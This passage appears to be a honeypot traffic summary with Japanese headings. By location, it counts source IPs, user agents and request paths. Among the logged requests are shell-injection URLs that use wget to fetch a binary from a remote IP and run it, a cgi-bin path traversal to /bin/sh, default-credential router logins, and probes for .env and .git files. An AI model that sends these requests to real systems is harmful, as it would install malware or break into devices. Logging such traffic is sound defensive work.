1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
8	`Mozilla/5.0`
1	`Root Slut`
1	`python-requests/2.25.1`

リクエスト内容一覧

件数	Method	Request	Protocol
4		`\x16\x03\x01\x01\x07\x01`
1		`\x16\x03\x01\x01\x18\x01`
1		`\x16\x03\x01\x01\xfb\x01`
10		`\x16\x03\x01`
3	CONNECT	`google[.]com:443`	HTTP/1.1
6	GET	`/.env`	HTTP/1.1
3	GET	`/.git/config`	HTTP/1.1
1	GET	`//.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/_api/web`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=ec8&psd=ec8`	HTTP/1.0
8	GET	`/cdn-cgi/trace`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/shell?cd+/tmp;+rm+-rf+shk;+wget+http:/\\/89.190.156.173/shk;+chmod+777+shk;+./shk+jaws;+rm+-rf+shk`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	POST	`/webtools/control/ProgramExport;/?USERNAME&PASSWORD&requirePasswordChange=Y`	HTTP/1.1
1	POST	`/webtools/control/SOAPService`	HTTP/1.1
1	POST	`/webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y`	HTTP/1.1
1	POST	`/webtools/control/xmlrpc`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	42.96.15.115	Vietnam
3	45.79.128.205	United States
1	45.79.181.94	United States
1	45.79.181.179	United States
12	54.36.115.221	France
4	54.37.79.75	France
1	65.49.1.89	United States
2	83.97.73.245	Germany
3	87.121.69.52	Bulgaria
1	139.59.101.104	Singapore
1	162.216.150.86	United States
4	165.154.182.221	Hong Kong
2	167.71.201.66	United States
2	167.94.145.55	United States
2	167.94.146.58	United States
1	167.99.206.237	United States
1	170.130.165.75	United States
1	172.104.11.34	United States
1	172.104.11.51	United States
1	172.104.242.173	United States
2	172.105.128.12	United States
1	175.6.99.204	China
1	175.198.181.78	South Korea
3	184.105.247.252	United States
1	185.224.128.34	Netherlands
1	192.155.90.220	United States
2	198.235.24.15	United States
2	198.235.24.133	United States
2	205.210.31.214	United States
1	222.140.228.241	China

UserAgent一覧

件数	UserAgent
26	`-`
1	`Custom-AsyncHttpClient`
1	`Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com`
3	`Go-http-client/1.1`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0`
16	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
3	`Mozilla/5.0`
1	`Root Slut`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x16\x03\x01\x01\x07\x01`
1		`\x16\x03\x01\x01\x17\x01`
1		`\x16\x03\x01\x01\xfc\x01`
18		`\x16\x03\x01`
1		`\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159`	X\xd4>\x12\x98\xc4<\xe0\x13\xcf
3	CONNECT	`google[.]com:443`	HTTP/1.1
1	CONNECT	`www[.]naver[.]com:80`	HTTP/1.1
16	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
2	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/shell?cd+/tmp;+rm+-rf+shk;+wget+http:/\\/89.190.156.173/shk;+chmod+777+shk;+./shk+jaws;+rm+-rf+shk`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4`
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	45.33.80.243	United States
1	45.56.108.128	United States
1	45.79.128.205	United States
2	45.79.181.94	United States
1	45.79.181.179	United States
1	45.79.181.223	United States
1	54.188.177.52	United States
16	57.129.23.166	France
1	65.49.1.82	United States
1	66.240.205.34	United States
1	68.183.61.22	United States
1	80.66.88.211	Russia
2	83.97.73.245	Germany
4	87.121.69.52	Bulgaria
1	162.243.145.40	United States
13	164.90.234.188	United States
2	165.154.225.168	Singapore
2	165.227.147.215	United States
2	167.71.202.190	United States
1	172.104.242.173	United States
3	184.105.139.68	United States
1	185.73.125.86	Estonia
1	185.170.144.3	Estonia
1	185.224.128.34	Netherlands
1	192.241.212.32	United States
2	198.235.24.135	United States
2	205.210.31.21	United States
1	212.70.149.134	Bulgaria

UserAgent一覧

件数	UserAgent
22	`-`
4	`Go-http-client/1.1`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.46`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36`
16	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
3	`Mozilla/5.0 zgrab/0.x`
2	`Mozilla/5.0`
1	`Root Slut`
1	`curl/8.1.2`
1	`python-requests/2.25.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`Gh0st\xad`
1		`MGLNDD_13.67.44.234_80`
3		`\x03`
1		`\x16\x03\x01\x01\x07\x01`
15		`\x16\x03\x01`
1		`\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159`	X\xd4>\x12\x98\xc4<\xe0\x13\xcf
4	CONNECT	`google[.]com:443`	HTTP/1.1
16	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/aaa9`	HTTP/1.1
1	GET	`/aab8`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
1	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cgi/conf.bin`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/shell?cd+/tmp;+rm+-rf+shk;+wget+http:/\\/89.190.156.173/shk;+chmod+777+shk;+./shk+jaws;+rm+-rf+shk`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1